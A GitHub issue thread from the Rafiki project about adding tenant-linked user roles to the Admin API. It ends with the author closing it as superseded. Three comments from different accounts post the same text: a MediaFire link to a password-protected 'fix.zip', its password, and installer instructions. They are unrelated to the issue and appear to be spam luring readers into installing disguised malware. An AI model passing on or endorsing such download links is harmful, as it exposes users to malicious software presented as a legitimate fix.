### ISSUE TITLE
Admin API User Roles

### ISSUE THREAD

**Issue by njlie** [interledger/rafiki#2895]
The Rafiki Admin Api needs to be able to distinguish between calls from different tenants when running in multi-tenant mode. These user roles will need to have an association with a `tenantId` that is used in the Rafiki backend database to identify which resources belong to which tenant.

- [ ] Move ORY Kratos to commonly-accessible package

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by njlie** [comment]
Superseded by #2903, #2900, #2916, #2929, #2915, #2930.
